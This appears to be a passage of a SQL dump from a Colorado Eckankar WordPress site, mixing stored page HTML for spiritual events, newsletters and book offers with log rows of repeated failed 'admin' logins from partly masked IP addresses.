0px;\">\r\n<div class=\"row\" style=\"padding-top: 0em; padding-bottom: 15px; border-bottom-left-radius: 0px;\">\r\n<div class=\"col-md-12 col-sm-12 col-xs-12 col-lg-12\">\r\n<div style=\"border-top: 7px solid #cd8a0e; background-color: #fbeed0; text-align: center; padding: 15px; box-shadow: rgba(0, 0, 0, 0.24) 0px 3px 8px; margin-top: -3px;\" class=\"\">\r\n<p class=\"\" style=\"text-align: center; margin: -40px 0px 25px;\">&nbsp;</p>\r\n<p class=\"\" style=\"font-size: 23px; font-weight: 600; text-align: center; color: rgba(62, 62, 62, 0.9);\" data-font-family=\"Raleway\" data-font-weight=\"600\" data-font-style=\"\">Spiritual Connections</p>\r\n<p class=\"\" style=\"font-size: 17px; font-family: \'Open Sans\'; font-weight: 400;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">The purpose of this Meetup group is to provide a common meeting ground for all who have had, or would like to have, a life-changing spiritual experience.</p>\r\n<p>&nbsp;</p>\r\n<p class=\"\" style=\"text-align: center;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" tabindex=\"0\" href=\"https://www.meetup.com/find/?keywords=eckankar&amp;source=GROUPS&amp;distance=hundredMiles&amp;location=us--co--Denver\" target=\"_blank\" rel=\"noopener\">Join Us On Meetup®<i class=\"arrow right\"></i></a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"col-md-4 col-sm-4 col-xs-12 col-lg-4\">\r\n<div class=\"row\" style=\"padding-top: 0em; padding-bottom: 15px;\">\r\n<div class=\"col-md-12 col-sm-12 col-xs-12 col-lg-12\">\r\n<div style=\"border-top: 7px solid #cd8a0e; background-color: #f5f2eb; padding: 15px; box-shadow: rgba(0, 0, 0, 0.24) 0px 3px 8px; margin-top: -3px;\" class=\"\">\r\n<p class=\"\" style=\"text-align: center; margin: -40px 0px 25px;\">&nbsp;</p>\r\n<p class=\"\" style=\"font-size: 23px; font-family: \'Raleway\'; font-weight: 600; text-align: center; color: rgba(62, 62, 62, 0.9);\" data-font-family=\"Raleway\" data-font-weight=\"600\" data-font-style=\"\">Get Your Monthly Newsletter!</p>\r\n<p class=\"\" style=\"text-align: center; font-size: 18px; font-weight: 600; font-family: \'Open Sans\';\" data-font-weight=\"600\" data-font-family=\"Open Sans\" data-font-style=\"\">Delivered right to your email inbox!</p>\r\n<p class=\"\" style=\"text-align: center; font-size: 17px; margin-bottom: 26px; font-family: \'Open Sans\'; font-weight: 400;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Keep up with all the latest news and events from around the state.</p>\r\n<p class=\"\" style=\"text-align: center;\"><a class=\"\" style=\"font-weight: 400; font-family: \'Open Sans\'; font-size: 16px;\" href=\"https://eckankar-colorado.org/resa-faq/newsletter-subscription-members/\" data-font-weight=\"400\" data-font-family=\"Open Sans\" data-font-style=\"\">(Sunscribe to Initiates Newsletter Here)</a></p>\r\n<p class=\"\" style=\"text-align: center;\"><em>&nbsp;</em><a class=\"btn btn-color-1 btn-raised btn-rounded\" tabindex=\"0\" href=\"https://eckankar-colorado.org/newsletter-subscription-public/\"> Public&nbsp;Newsletter Signup<i class=\"arrow right\"></i></a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"col-md-4 col-sm-4 col-xs-12 col-lg-4\">\r\n<div class=\"row\" style=\"padding-top: 0em; padding-bottom: 15px; box-shadow: #cecece 0px 0px 0px 0px inset;\">\r\n<div class=\"col-md-12 col-sm-12 col-xs-12 col-lg-12\">\r\n<div style=\"border-top: 7px solid #cd8a0e; background-color: #fbeed0; padding: 15px; box-shadow: rgba(0, 0, 0, 0.24) 0px 3px 8px; margin-top: -3px;\" class=\"\">\r\n<p class=\"\" style=\"text-align: center; margin: -40px 0px 25px;\">&nbsp;</p>\r\n<p class=\"\" style=\"font-family: \'Raleway\'; font-weight: 600; font-size: 23px; text-align: center; color: rgba(62, 62, 62, 0.9);\" data-font-family=\"Raleway\" data-font-weight=\"600\" data-font-style=\"\">ECK Books Just For You</p>\r\n<p class=\"\" style=\"text-align: center; font-size: 17px; margin-top: 6px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">Find out how past lives, dreams, and<br>\r\nSoul Travel help you find God</p>\r\n<p class=\"\" style=\"text-align: center; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">This free-book offer includes two titles:<br>\r\n<strong><em>ECKANKAR—Ancient Wisdom for Today</em></strong> and <strong><em>Is Life a Random Walk?</em></strong></p>\r\n<p class=\"mod-reset\" style=\"text-align: center;\">&nbsp;</p>\r\n<p class=\"\" style=\"text-align: center;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" href=\"https://www.eckankar.org/freebook/wisdom/\" target=\"_blank\" rel=\"noopener\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Get Your ECK Books!<i class=\"arrow right\"></i></a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"color-1-text-contrast bg-background-color tmpl-media-7 boldgrid-section dynamic-gridblock\">\r\n<div class=\"container\">\r\n<div class=\"row bg-background-color color1-background-color color-1-text-contrast\" style=\"padding-top: 67px; padding-bottom: 63px; box-shadow: rgba(0, 0, 0, 0.15) 0px 2px 8px; margin-bottom: 25px;\">\r\n<div class=\"col-md-6 col-xs-12 col-sm-6 text-center col-lg-5\" style=\"box-shadow: #cecece 0px 0px 0px 0px inset; padding-right: 0em;\">\r\n<p>[embed] https://www.youtube.com/watch?v=s78XVcM7HWI[/embed]</p>\r\n</div>\r\n<div class=\"col-md-6 col-xs-12 col-sm-6 col-lg-7\">\r\n<h2 class=\"\" style=\"font-family: \'Open Sans\'; font-weight: 600; box-shadow: #cecece 0px 0px 0px 0px inset; margin-top: -12px; color: #cd8a0e; font-size: 19px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">Featured eck Video</h2>\r\n<p class=\"\" style=\"font-size: 29px; font-family: \'Open Sans\'; font-weight: 600; color: #697085;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">DO YOU LONG TO KNOW LIFE\'S PURPOSE?</p>\r\n<p class=\"\" style=\"font-size: 17px;\">You are Soul, an eternal, creative being. Unlimited. Divine.</p>\r\n<p class=\"\" style=\"font-size: 17px;\">If you are ready for your next spiritual step, Eckankar’s Advanced Spiritual Living Courses offer a roadmap for your journey home to the heights of Self-Discovery and God-Discovery.</p>\r\n<p class=\"\" style=\"font-size: 17px;\">You don’t need to change your lifestyle to live a rich spiritual life. Enlightenment comes in a natural way from the inside out.</p>\r\n<p class=\"\" style=\"font-size: 17px;\">Ready to get your keys to spiritual transformation?</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>'),(213175,35046,'server_http_user_agent','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.109 Safari/537.36'),(213168,35044,'_message_key','user_unknown_login_failed'),(213174,35046,'failed_username','admin'),(213172,35045,'_message_key','user_unknown_login_failed'),(213173,35045,'_server_remote_addr','51.77.230.x'),(213169,35044,'_server_remote_addr','161.53.107.x'),(213170,35045,'failed_username','admin'),(213171,35045,'server_http_user_agent','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36'),(213176,35046,'_message_key','user_unknown_login_failed'),(213177,35046,'_server_remote_addr','146.190.217.x'),(213405,35102,'_server_remote_addr','20.216.24.x'),(213403,35102,'server_http_user_agent','Mozilla/5.0'),(213404,35102,'_message_key','user_unknown_login_failed'),(213178,35047,'failed_username','admin'),(213179,35047,'server_http_user_agent','Mozilla/5.0'),(213180,35047,'_message_key','user_unknown_login_failed'),(213181,35047,'_server_remote_addr','20.216.24.x'),(213182,35048,'failed_username','admin'),(213183,35048,'server_http_user_agent','Mozilla/5.0'),(213184,35048,'_message_key','user_unknown_login_failed'),(213185,35048,'_server_remote_addr','20.216.24.x'),(213186,35049,'failed_username','admin'),(213187,35049,'server_http_user_agent','Mozilla/5.0'),(213188,35049,'_message_key','user_unknown_login_failed'),(213189,35049,'_server_remote_addr','20.216.24.x'),(213190,35050,'failed_username','admin'),(213191,35050,'server_http_user_agent','Mozilla/5.0'),(213192,35050,'_message_key','user_unknown_login_failed'),(213193,35050,'_server_remote_addr','20.216.24.x'),(213194,35051,'failed_username','admin'),(213195,35051,'server_http_user_agent','Mozilla/5.0'),(213196,35051,'_message_key','user_unknown_login_failed'),(213197,35051,'_server_remote_addr','20.216.24.x'),(213198,35052,'failed_username','admin'),(213199,35052,'server_http_user_agent','Mozilla/5.0'),(213200,35052,'_message_key','user_unknown_login_failed'),(213201,35052,'_server_remote_addr','20.216.24.x'),(213202,35053,'failed_username','admin'),(213203,35053,'server_http_user_agent','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.111 Safari/537.36 MVisionPlayer/1.0.0.0'),(213204,35053,'_message_key','user_unknown_login_failed'),(213205,35053,'_server_remote_addr','165.227.236.x'),(213206,35054,'failed_username','admin'),(213207,35054,'server_http_user_agent','Mozilla/5.0'),(213208,35054,'_message_key','user_unknown_login_failed'),(213209,35054,'_server_remote_addr','20.216.24.x'),(213210,35055,'failed_username','admin'),(213211,35055,'server_http_user_agent','Mozilla/5.0'),(213212,35055,'_message_key','user_unknown_login_failed'),(213213,35055,'_server_remote_addr','20.216.24.x'),(213214,35056,'failed_username','admin'),(213215,35056,'server_http_user_agent','Mozilla/5.0'),(213216,35056,'_message_key','user_unknown_login_failed'),(213217,35056,'_server_remote_addr','20.216.24.x'),(213218,35057,'failed_username','admin'),(213219,35057,'server_http_user_agent','Mozilla/5.0'),(213220,35057,'_message_key','user_unknown_login_failed'),(213221,35057,'_server_remote_addr','20.216.24.x'),(213222,35058,'failed_username','admin'),(213223,35058,'server_http_user_agent','Mozilla/5.0'),(213224,35058,'_message_key','user_unknown_login_failed'),(213225,35058,'_server_remote_addr','20.216.24.x'),(213226,35059,'post_id','269113'),(213227,35059,'post_type','nf_sub'),(213228,35059,'post_title',''),(213229,35059,'_message_key','post_updated'),(213230,35059,'_server_remote_addr','75.216.248.x'),(213231,35059,'_server_http_referer','https://eckankar-colorado.org/resa-faq/satsang-class-registrations-2023-2024/'),(213232,35060,'failed_username','admin'),(213233,35060,'server_http_user_agent','Mozilla/5.0'),(213234,35060,'_message_key','user_unknown_login_failed'),(213235,35060,'_server_remote_addr','20.216.24.x'),(213236,35061,'failed_username','admin'),(213237,35061,'server_http_user_agent','Mozilla/5.0'),(213238,35061,'_message_key','user_unknown_login_failed'),(213239,35061,'_server_remote_addr','20.216.24.x'),(213240,35062,'failed_username','admin'),(213241,35062,'server_http_user_agent','Mozilla/5.0'),(213242,35062,'_message_key','user_unknown_login_failed'),(213243,35062,'_server_remote_addr','20.216.24.x'),(213244,35063,'failed_username','admin'),(213245,35063,'server_http_user_agent','Mozilla/5.0'),(213246,35063,'_message_key','user_unknown_login_failed'),(213247,35063,'_server_remote_addr','20.216.24.x'),(213248,35064,'failed_username','admin'),(213249,35064,'server_http_user_agent','Mozilla/5.0'),(213250,35064,'_message_key','user_unknown_login_failed'),(213251,35064,'_server_remote_addr','20.216.24.x'),(213252,35065,'failed_username','admin'),(213253,35065,'server_http_user_agent','Mozilla/5.0'),(213254,35065,'_message_key','user_unknown_login_failed'),(213255,35065,'_server_remote_addr','20.216.24.x'),(213256,35066,'failed_username','admin'),(213257,35066,'server_http_user_agent','Mozilla/5.0'),(213258,35066,'_message_key','user_unknown_login_failed'),(213259,35066,'_server_remote_addr','20.216.24.x'),(213260,35067,'failed_username','admin'),(213261,35067,'server_http_user_agent','Mozilla/5.0'),(213262,35067,'_message_key','user_unknown_login_failed'),(213263,35067,'_server_remote_addr','20.216.24.x'),(213264,35068,'failed_username','admin'),(213265,35068,'server_http_user_agent','Mozilla/5.0'),(213266,35068,'_message_key','user_unknown_login_failed'),(213267,35068,'_server_remote_addr','20.216.24.x'),(213268,35069,'failed_username','admin'),(213269,35069,'server_http_user_agent','Mozilla/5.0'),(213270,35069,'_message_key','user_unknown_login_failed'),(213271,35069,'_server_remote_addr','20.216.24.x'),(213272,35070,'failed_username','admin'),(213273,35070,'server_http_user_agent','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.122 Safari/537.36'),(213274,35070,'_message_key','user_unknown_login_failed'),(213275,35070,'_server_remote_addr','43.241.70.x'),(213276,35071,'post_id','269114'),(213277,35071,'post_type','nf_sub'),(213278,35071,'post_title',''),(213279,35071,'_message_key','post_updated'),(213280,35071,'_server_remote_addr','75.169.5.x'),(213281,35071,'_server_http_referer','https://eckankar-colorado.org/resa-faq/satsang-class-registrations-2023-2024/'),(213282,35072,'failed_username','admin'),(213283,35072,'server_http_user_agent','Mozilla/5.0'),(213284,35072,'_message_key','user_unknown_login_failed'),(213285,35072,'_server_remote_addr','20.216.24.x'),(213286,35073,'failed_username','admin'),(213287,35073,'server_http_user_agent','Mozilla/5.0'),(213288,35073,'_message_key','user_unknown_login_failed'),(213289,35073,'_server_remote_addr','20.216.24.x'),(213290,35074,'failed_username','admin'),(213291,35074,'server_http_user_agent','Mozilla/5.0'),(213292,35074,'_message_key','user_unknown_login_failed'),(213293,35074,'_server_remote_addr','20.216.24.x'),(213294,35075,'failed_username','admin'),(213295,35075,'server_http_user_agent','Mozilla/5.0'),(213296,35075,'_message_key','user_unknown_login_failed'),(213297,35075,'_server_remote_addr','20.216.24.x'),(213298,35076,'failed_username','admin'),(213299,35076,'server_http_user_agent','Mozilla/5.0'),(213300,35076,'_message_key','user_unknown_login_failed'),(213301,35076,'_server_remote_addr','20.216.24.x'),(213302,35077,'failed_username','admin'),(213303,35077,'server_http_user_agent','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.97 Safari/537.36'),(213304,35077,'_message_key','user_unknown_login_failed'),(213305,35077,'_server_remote_addr','47.99.71.x'),(213306,35078,'failed_username','admin'),(213307,35078,'server_http_user_agent','Mozilla/5.0'),(213308,35078,'_message_key','user_unknown_login_failed'),(213309,35078,'_server_remote_addr','20.216.24.x'),(213310,35079,'failed_username','admin'),(213311,35079,'server_http_user_agent','Mozilla/5.0'),(213312,35079,'_message_key','user_unknown_login_failed'),(213313,35079,'_server_remote_addr','20.216.24.x'),(213314,35080,'failed_username','admin'),(213315,35080,'server_http_user_agent','Mozilla/5.0'),(213316,35080,'_message_key','user_unknown_login_failed'),(213317,35080,'_server_remote_addr','20.216.24.x'),(213318,35081,'failed_username','admin'),(213319,35081,'server_http_user_agent','Mozilla/5.0'),(213320,35081,'_message_key','user_unknown_login_failed'),(213321,35081,'_server_remote_addr','20.216.24.x'),(213322,35082,'failed_username','admin'),(213323,35082,'server_http_user_agent','Mozilla/5.0'),(213324,35082,'_message_key','user_unknown_login_failed'),(213325,35082,'_server_remote_addr','20.216.24.x'),(213326,35083,'failed_username','admin'),(213327,35083,'server_http_user_agent','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.115 Safari/537.36'),(213328,35083,'_message_key','user_unknown_login_failed'),(213329,35083,'_server_remote_addr','116.62.206.x'),(213330,35084,'failed_username','admin'),(213331,35084,'server_http_user_agent','Mozilla/5.0'),(213332,35084,'_message_key','user_unknown_login_failed'),(213333,35084,'_server_remote_addr','20.216.24.x'),(213334,35085,'failed_username','admin'),(213335,35085,'server_http_user_agent','Mozilla/5.0'),(213336,35085,'_message_key','user_unknown_login_failed'),(213337,35085,'_server_remote_addr','20.216.24.x'),(213338,35086,'failed_username','admin'),(213339,35086,'server_http_user_agent','Mozilla/5.0'),(213340,35086,'_message_key','user_unknown_login_failed'),(213341,35086,'_server_remote_addr','20.216.24.x'),(213342,35087,'failed_username','admin'),(213343,35087,'server_http_user_agent','Mozilla/5.0'),(213344,35087,'_message_key','user_unknown_login_failed'),(213345,35087,'_server_remote_addr','20.216.24.x'),(213346,35088,'failed_username','admin'),(213347,35088,'server_http_user_agent','Mozilla/5.0'),(213348,35088,'_message_key','user_unknown_login_failed'),(213349,35088,'_server_remote_addr','20.216.24.x'),(213350,35089,'failed_username','admin'),(213351,35089,'server_http_user_agent','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36'),(213352,35089,'_message_key','user_unknown_login_failed'),(213353,35089,'_server_remote_addr','103.158.206.x'),(213354,35090,'failed_username','admin'),(213355,35090,'server_http_user_agent','Mozilla/5.0'),(213356,35090,'_message_key','user_unknown_login_failed'),(213357,35090,'_server_remote_addr','20.216.24.x'),(213358,35091,'failed_username','admin'),(213359,35091,'server_http_user_agent','Mozilla/5.0'),(213360,35091,'_message_key','user_unknown_login_failed'),(213361,35091,'_server_remote_addr','20.216.24.x'),(213362,35092,'failed_username','admin'),(213363,35092,'server_http_user_agent','Mozilla/5.0'),(213364,35092,'_message_key','user_unknown_login_failed'),(213365,35092,'_server_remote_addr','20.216.24.x'),(213366,35093,'failed_username','admin'),(213367,35093,'server_http_user_agent','Mozilla/5.0'),(213368,35093,'_message_key','user_unknown_login_failed'),(213369,35093,'_server_remote_addr','20.216.24.x'),(213370,35094,'failed_username','admin'),(213371,35094,'server_http_user_agent','Mozilla/5.0'),(213372,35094,'_message_key','user_unknown_login_failed'),(213373,35094,'_server_remote_addr','20.216.24.x'),(213374,35095,'failed_username','admin'),(213375,35095,'server_http_user_agent','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36'),(213376,35095,'_message_key','user_unknown_login_failed'),(213377,35095,'_server_remote_addr','173.236.176.x'),(213378,35096,'failed_username','admin'),(213379,35096,'server_http_user_agent','Mozilla/5.0'),(213380,35096,'_message_key','user_unknown_login_failed'),(213381,35096,'_server_remote_addr','20.216.24.x'),(213382,35097,'failed_username','admin'),(213383,35097,'server_http_user_agent','Mozilla/5.0'),(213384,35097,'_message_key','user_unknown_login_failed'),(213385,35097,'_server_remote_addr','20.216.24.x'),(213386,35098,'failed_username','admin'),(213387,35098,'server_http_user_agent','Mozilla/5.0'),(213388,35098,'_message_key','user_unknown_login_failed'),(213389,35098,'_server_remote_addr','20.216.24.x'),(213390,35099,'failed_username','admin'),(213391,35099,'server_http_user_agent','Mozilla/5.0'),(213392,35099,'_message_key','user_unknown_login_failed'),(213393,35099,'_server_remote_addr','20.216.24.x'),(213394,35100,'failed_username','admin'),(213395,35100,'server_http_user_agent','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.163 Safari/537.36'),(213396,35100,'_message_key','user_unknown_login_failed'),(213397,35100,'_server_remote_addr','8.129.212.x'),(213398,35101,'failed_username','admin'),(213399,35101,'server_http_user_agent','Mozilla/5.0'),(213400,35101,'_message_key','user_unknown_login_failed'),(213401,35101,'_server_remote_addr','20.216.24.x'),(213402,35102,'failed_username','admin'),(212975,35027,'post_new_post_content','<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\">\r\n<p class=\"\" style=\"line-height: 32px;\"><span style=\"font-size: 20pt;\"><strong><span class=\"\" style=\"color: #ad7f14;\">Access the God-Current with HU</span></strong></span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">You are warmly invited to experience HU, an ancient mantra and divine sound that courses through all of life and through every atom of your body. HU is an ancient name for God, a sacred sound and a carrier of love between Soul and God. It has been sung for thousands of years, and in many places, for spiritual unfoldment. It can uplift people of any religion, culture, or walk of life.</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">Singing HU acts as a tuning fork, aligning Soul to higher states of love, creativity, healing, and awareness. When sung or chanted with an open heart, it opens the lines of communication to the most sacred part of yourself.</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">In this event, you will have the opportunity to experience some of the many benefits of singing HU:</span></p>\r\n<ul class=\"pl-5 list-disc mb-4\">\r\n	<li><span style=\"font-size: 14pt;\">Inner peace and calm</span></li>\r\n	<li><span style=\"font-size: 14pt;\">Divine love</span></li>\r\n	<li><span style=\"font-size: 14pt;\">Expanded awareness</span></li>\r\n	<li><span style=\"font-size: 14pt;\">Spiritual self-discovery and growth</span></li>\r\n	<li><span style=\"font-size: 14pt;\">Healing of the heart</span></li>\r\n</ul>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">We will chant HU for 15 to 20 minutes, have a few minutes of quiet contemplation followed by spiritual conversation with others of like heart.</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">This event is sponsored by Eckankar and is free of charge.</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">Find out more about HU at&nbsp;<a class=\"!text-viridian\" href=\"https://www.eckankar.org/experience/hu-the-sound-of-soul/\" target=\"_blank\" rel=\"nofollow noopener ugc\">What is HU? | HU is the Sound of Soul | ECKANKAR</a>.</span></p>\r\n<p class=\"\"><a class=\"meetupreg\" href=\"https://www.meetup.com/segofdenver/events/296207143/\" target=\"_blank\" rel=\"noopener noreferrer\">Register Now!</a></p>\r\n<p class=\"\"><span style=\"font-size: 12pt;\"><strong>COVID-19 Safety Measures<br>\r\n**</strong> <em>Since contracting COVID-19 may still be possible, please take the health steps you consider best. It is appreciated that by attending you are taking responsibility for your own health.</em></span></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>'),(242986,41195,'post_prev_post_content','<div style=\"height: 178px; width: 100%; margin-top: -129px; z-index: 1; position: absolute; overflow: hidden;\"><svg viewBox=\"0 0 500 150\" preserveAspectRatio=\"none\" style=\"height: 100%; width: 100%;\"><path d=\"M-3.10,41.93 C187.08,206.73 329.85,-11.33 500.00,49.98 L500.00,150.00 L0.00,150.00 Z\" style=\"stroke: none; fill: #ffffff;\"></path></svg></div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-lg-12 col-md-12 col-xs-12 col-sm-12\">\r\n<p>&nbsp;</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 80px; border-width: 0px; padding-bottom: 55px;\">\r\n<div class=\"col-lg-1 col-md-12 col-sm-12 col-xs-12\">\r\n<p>&nbsp;</p>\r\n</div>\r\n<div class=\"col-lg-10 col-md-12 col-xs-12 col-sm-12 welcome-card\" style=\"border-width: 0px; background-color: #f8fbf8 !important; z-index: 2; margin-top: -235px;\">\r\n<p class=\"\" style=\"border-width: 0px; margin-left: auto; margin-right: auto; text-align: center; font-family: \'Raleway\'; font-size: 30px; color: #1e63bc; font-weight: 600;\" data-font-style=\"\" data-font-family=\"Raleway\" data-font-weight=\"600\">WELCOME TO ECKANKAR IN COLORADO!</p>\r\n<p class=\"\" style=\"text-align: center; font-size: 19px; color: rgba(61, 61, 61, 0.88);\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Does something inside you long to know life’s purpose? To make sense of the world around you?</p>\r\n<p class=\"\" style=\"text-align: center; border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 19px; color: rgba(61, 61, 61, 0.88);\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">You are Soul, an eternal, creative being. Unlimited. Divine.</p>\r\n<p class=\"\" style=\"font-size: 19px; text-align: center; color: rgba(61, 61, 61, 0.88);\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Eckankar is an active, individual, creative practice―a companion and road map for your journey home to the heights of Self-Discovery, God-Discovery, and beyond.</p>\r\n<p class=\"\" style=\"text-align: center; border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 19px; color: rgba(61, 61, 61, 0.88);\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Come along and discover the most secret part of yourself.</p>\r\n<p class=\"\" style=\"text-align: center; border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 21px; color: rgba(61, 61, 61, 0.88); margin-bottom: 2px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\"><strong>Join us for the events below to discover your life as a spiritual adventure!</strong></p>\r\n</div>\r\n<div class=\"col-lg-1 col-md-12 col-sm-12 col-xs-12\"></div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 20px; border-radius: 3px; padding-bottom: -15px;\">\r\n<div class=\"col-lg-12 col-md-12 col-xs-12 col-sm-12\">\r\n<p class=\"\" style=\"font-size: 35px; color: #666666; text-align: center; font-weight: 500; box-shadow: #cecece 0px 0px 0px 0px inset; margin-bottom: 0px; font-family: Raleway;\" data-font-weight=\"500\" data-font-family=\"Raleway\" data-font-style=\"\">ECK SOUL ADVENTURE EVENTS</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"temp-gridblock-wrapper\"></div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 0px; padding-bottom: 6px;\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\">\r\n<p class=\"\">[MEC id=\"268667\"]</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"color-1-text-contrast bg-background-color tmpl-media-7 boldgrid-section dynamic-gridblock\">\r\n<div class=\"container\">\r\n<div class=\"row bg-background-color color1-background-color color-1-text-contrast\" style=\"padding-top: 36px; padding-bottom: 29px; margin-bottom: 25px;\">\r\n<div class=\"col-md-6 col-xs-12 col-sm-6 text-center col-lg-6\" style=\"box-shadow: #cecece 0px 0px 0px 0px inset; padding-right: 0em;\">\r\n<p class=\"mod-reset\"><img class=\"alignnone wp-image-269414 size-full\" style=\"box-shadow: rgba(0, 0, 0, 0.45) 0px 25px 20px -20px;\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/11/streaming-web-promo-1.jpg\" alt=\"\" width=\"801\" height=\"445\"></p>\r\n<p class=\"\" style=\"font-style: normal; font-family: \'Open Sans\'; font-weight: 600; font-size: 19px; text-align: center; color: #cd8a0e;\" data-font-style=\"normal\" data-font-weight=\"600\" data-font-family=\"Open Sans\">New to ECK? Guests register free!</p>\r\n<p class=\"\" style=\"text-align: center;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" href=\"https://www.eckankar.org/engage/eck-soul-adventure-seminars/\" target=\"_blank\" rel=\"noopener\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Get More Information and Register Now!<i class=\"arrow right\"></i></a></p>\r\n</div>\r\n<div class=\"col-md-6 col-xs-12 col-sm-6 col-lg-6\" style=\"padding-right: 0em; padding-left: 2em;\">\r\n<h2 class=\"\" style=\"font-family: \'Open Sans\'; font-weight: 600; box-shadow: #cecece 0px 0px 0px 0px inset; margin-top: 5px; color: #cd8a0e; font-size: 19px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">Now streaming through January 31, 2024</h2>\r\n<p class=\"\" style=\"font-size: 21px; font-family: \'Open Sans\'; font-weight: bold; color: #697085; line-height: 26px;\" data-font-family=\"Open Sans\" data-font-weight=\"700\" data-font-style=\"\">Experience the spiritual wonders of the 2023 ECKANKAR Soul Adventure Seminar from anywhere!</p>\r\n<p class=\"\" style=\"font-size: 17px; font-family: \'Open Sans\'; font-weight: 400;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Hear Sri Harold, the Mahanta, the Living ECK Master, speak to the world. His stories and wisdom open the heart to a higher love and show you practical ways to live the spiritual life to its fullest potential.</p>\r\n<p class=\"\" style=\"font-size: 17px; font-family: \'Open Sans\'; font-weight: 600;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">Featured Events Include:</p>\r\n<ul class=\"\" style=\"font-size: 17px; font-family: \'Open Sans\'; font-weight: 400;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">\r\n	<li>Keynote talk, by Sri Harold Klemp, the spiritual leader of ECKANKAR;</li>\r\n	<li>All main-stage talks and performances; and</li>\r\n	<li>The 2023 digital Spiritual Art Gallery.</li>\r\n	<li>NEW ECKANKAR Soul Adventure Podcast—Animals Are Souls Too</li>\r\n	<li>ECK Soul Adventure Magazine—How Do We Soul Travel?</li>\r\n</ul>\r\n<p class=\"\" style=\"text-align: left; font-family: \'Open Sans\'; font-weight: 600; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">Take your next spiritual step today.<br>\r\nYour life can truly be a Soul Adventure!</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 23px; padding-bottom: 0px;\">\r\n<div class=\"col-lg-12 col-md-12 col-sm-12 col-xs-12\">\r\n<p class=\"\" style=\"text-align: center; border-width: 0px; font-family: Raleway; font-weight: 500; font-size: 36px; color: #697085;\" data-font-family=\"Raleway\" data-font-weight=\"500\" data-font-style=\"\">FOR YOU FROM 